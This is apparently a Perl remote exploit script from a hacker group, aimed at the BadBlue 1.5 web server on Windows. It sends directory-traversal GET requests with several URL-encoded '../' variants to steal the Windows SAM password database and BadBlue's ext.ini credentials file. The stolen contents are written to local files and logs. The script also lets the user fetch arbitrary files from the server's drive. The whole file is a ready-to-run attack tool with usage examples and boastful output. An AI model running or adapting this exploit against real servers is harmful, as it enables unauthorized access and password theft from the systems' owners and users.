#!/usr/bin/perl
#
# - [ElectronicSouls] Private Do Not Distrobute -
#
# Remote Exploit For BadBlue 1.5 Web Server
# www.badblue.com
#
# A transversal bug has been discovered in
# BadBlue HTTP Daemon SoftWare. This is a
# gay bug, yes I know. But it can be kinda
# funny for those days you are bored =)
#
# Vulnerable System: Windows 95
# Windows 98
# Windows ME
# Windows NT 3.5
# Windows NT 4.0
# Windows 2000
# Windows XP
#
# syntax:
#
# -h --- Specify Host Name
# -p --- Specify Host Port
# -o --- For Grabbing Anothern file
# -l --- For Logging.
# -O --- Specify What OS
# 9x --- For Windows 95/98/mE (Gets the ext.ini with passwords)
# NT --- For Windows NT 3/4 (Gets sam file and ext.ini)
# 2K --- For Windows 2K SP-012 (Gets sam file and ext.ini)
# XP --- For Windows XP ALL
#
# perl badxploit.pl -h www.host.com -p 80 -l esh0yday.log -O 9x - For Win/9x
# perl badxploit.pl -h www.host.com -p 80 -l esh0yday.log -O NT - For Win/NT
# perl badxploit.pl -h www.host.com -p 80 -l esh0yday.log -o 2X - For Win/2K/XP
#
# *************************************************************************
# ** For the '-o' syntax you need to know the exact location of the file **
# ** NOTE! You can only get files from the same drive as BadBlue **
# ** **
# ** Eg if($badblue-drive == $c:) {syntax will be get a file C:\boot.ini **
# ** perl badxploit.pl -h www.host.com -p 80 -l es.log -o boot.ini } **
# ** Now check es.log for the contents of boot.ini =) **
# *************************************************************************
#
# You'll figure it out, If you don't understand.
#
# Greets: Websk8ter, BrainStorm, asmodian, _0x90_, divine, FreQ, northern, CraiK
# kokshin, rocky, omnis, NtWaK0, loophole, icesk, tsilik, crazyl0rd, [t]hief
# CraigTM, DeadMouse, irrupt, izik, sagi, ofer, natrix, samko, blah everyone else
# [!ElectronicSouls], HHP
#
# Special THNX AND GREET TO *** Pneuma *** for being there for me =) Luv ya!@
#
# Bug discovered and written by Iceburg of [!ElectronicSouls].
use Socket;
use Getopt::Std;
getopts("O:o:h:p:l:", \%args);
print ("\n");
print ("==================================================\n");
print ("== -- Remote Exploit For BadBlue 1.5 WebServers ==\n");
print ("== -- Discovered and Written By Iceburg ==\n");
print ("== -- [ElectronicSouls] Production. ==\n");
print ("==================================================\n");
print ("\n");
if (!defined $args{h}) {
print qq~
syntax:
-h --- Specify Host Name
-p --- Specify Host Port
-o --- For Grabbing Anothern file
-l --- For Logging.
-O --- Specify What OS
--9x --- For Windows 95/98/mE (Gets the ext.ini with passwords)
--NT --- For Windows NT 3/4 (Gets sam file and ext.ini)
--2K --- For Windows 2K SP-012 (Gets sam file and ext.ini)
--XP --- For Windows XP ALL
Syntax are case sensitive =)
~; exit; }
if (defined $args{h}) { $host=$args{h}; print "*** Exploiting $host ...\n"; }
if (defined $args{p}) { $port = $args{p} } else { $port = "80"; }
if (defined $args{l}) {
$file=$args{l};
$log=1;
open (LOG,">$file") || die ("*** Cannot open file for logging\n");
print LOG ("*** [ElectronicSouls] Production\n");
print LOG ("*** BadBlue 1.5 Remote Exploit\n");
print LOG ("*** Discovered And Written By Iceburg\n\n"); }
# This is like eleet unicode.
# I know more but I am too lazy to type it out.
# If these don't work try adding some more ..%2F||252f||255c..
# These are for default directories, if the directory ain't default
# it won't work, therefor you can use '-o' syntax.
# Win9x/mE Strings && WinNT/2K/XP
@sploits1 = (
"[ElectronicSouls]/..%2f../ext.ini", # Main String
"[0WNZ]/..%252f..%252f../ext.ini", # Alternative
"[YOU]/..%255c..%255c../ext.ini", ); # Alternative
# WinNT Strings
@sploits2 = (
"..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._",
"..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._",
"..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._",);
# Win2K Strings
@sploits3 = (
"..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam",
"..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam",
"..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam",);
# WinXP String
@sploits4 = (
"..%2F..%2F..%2F..%2F..%2F../windows/repair/sam",
"..%252f..%252f..%252f..%252f..%252f../windows/repair/sam",
"..%255c..%255c..%255c..%255c..%255c../windows/repair/sam",);
if (defined $args{o}) {
$string = $args{o};
print ("*** Using Manual String $string\n");
&connect;
send(SOCK,"GET /$string HTTP/1.0\r\n\r\n",0);
@ocheck=<SOCK>;
($http,$code,$blah) = split(/ /,$ocheck[0]);
if($code == 200) {
print ("=========================\n");
print ("*** Server is vulnerable \n");
print ("=========================\n");
print ("\n @ocheck\n");
print ("=========================\n");
if ($log) { print LOG ("==========================\n"); }
if ($log) { print LOG ("*** Server is vulnerable \n"); }
if ($log) { print LOG ("==========================\n"); }
if ($log) { print LOG ("@ocheck\n"); }
if ($log) { print LOG ("==========================\n"); }
die ("*** J00 15 kr4d+LUC|<Y+hax0r n0w\n\n"); } else { print ("*** SORRY J00 kr4|) H4x0r 7r1x0r d1|) n07 w3r|<\n\n"); }
}
if (defined $args{O}) {
if ($args{O} =~ "XP") { print ("*** Probing WinXP - ALL\n\n"); test4(); }
if ($args{O} =~ "2K") { print ("*** Probing Win2K - SP1-2\n\n"); test3(); }
if ($args{O} =~ "NT") { print ("*** Probing WinNT - 3/4\n\n"); test2(); }
if ($args{O} =~ "9x") { print ("*** Probing Win9x - ME\n\n"); test1(); }
}
sub test4 {
foreach $xploit4 (@sploits4) {
&connect;
send(SOCK,"GET /$xploit4 HTTP/1.0\r\n\r\n",0);
@check4=<SOCK>;
($http,$code,$blah) = split(/ /,$check4[0]);
if($code == 200) {
print ("=========================\n");
print ("*** Server is vulnerable \n");
print ("*** Getting sam file \n");
print ("=========================\n");
print ("\n");
open(SAM,">sam") || error();
my $x;
for ($x=8;$x<=30;$x++) {
print SAM ("$check4[$x]"); }
test1();
} else { print ("*** Server is not vulberable to string $xploit4\n"); }
close(SOCK); }
}
sub test3 {
foreach $xploit3 (@sploits3) {
&connect;
send(SOCK,"GET /$xploit3 HTTP/1.0\r\n\r\n",0);
@check3=<SOCK>;
($http,$code,$blah) = split(/ /,$check3[0]);
if($code == 200) {
print ("=========================\n");
print ("*** Server is vulnerable \n");
print ("*** Getting sam file \n");
print ("=========================\n");
print ("\n");
open(SAM,">sam") || error();
my $x;
for ($x=8;$x<=30;$x++) {
print SAM ("$check3[$x]"); }
test1();
} else { print ("*** Server is not vulberable to string $xploit3\n"); }
close(SOCK); }
}
sub test2 {
foreach $xploit2 (@sploits2) {
&connect;
send(SOCK,"GET /$xploit2 HTTP/1.0\r\n\r\n",0);
@check2=<SOCK>;
($http,$code,$blah) = split(/ /,$check2[0]);
if($code == 200) {
print ("=========================\n");
print ("*** Server is vulnerable \n");
print ("*** Getting sam file \n");
print ("=========================\n");
print ("\n");
open(SAM,">sam") || error();
my $x;
for ($x=8;$x<=30;$x++) {
print SAM ("$check2[$x]\n");
}
test1();
} else { print ("*** Server is not vulberable to string $xploit2\n"); }
close(SOCK); }
}
sub test1 {
foreach $xploit1 (@sploits1) {
&connect;
send(SOCK,"GET /$xploit1 HTTP/1.0\r\n\r\n",0);
@check=<SOCK>;
#print "@check";
($http,$code,$blah) = split(/ /,$check[0]);
if($code == 200) {
print ("===============================\n");
print ("*** Getting contents of ext.ini\n");
print ("*** Server is vulnerable \n");
print ("===============================\n");
print ("\n @check\n");
print ("===============================\n");
if ($log) { print LOG ("==========================\n"); }
if ($log) { print LOG ("*** Server is vulnerable \n"); }
if ($log) { print LOG ("*** Contents of ext.ini \n"); }
if ($log) { print LOG ("==========================\n"); }
for ($i=8;$i<=@check;$i++) { if ($log) { print LOG ("$check[$i]"); } }
if ($log) { print LOG ("==========================\n"); }
die ("*** J00 15 kr4d-hax0r n0w\n");
} else { print ("*** Server is not vulberable to string $xploit1\n"); }
close(SOCK); }
}
sub connect {
my($iaddr,$paddr,$proto);
$iaddr = inet_aton($host) || die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
$proto = getprotobyname('tcp') || die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!");
connect(SOCK, $paddr) || die("Unable to connect: $!");
}
sub error {
print ("For some weird reason a error has occured: $!\n");
print ("Continueing ...\n");
}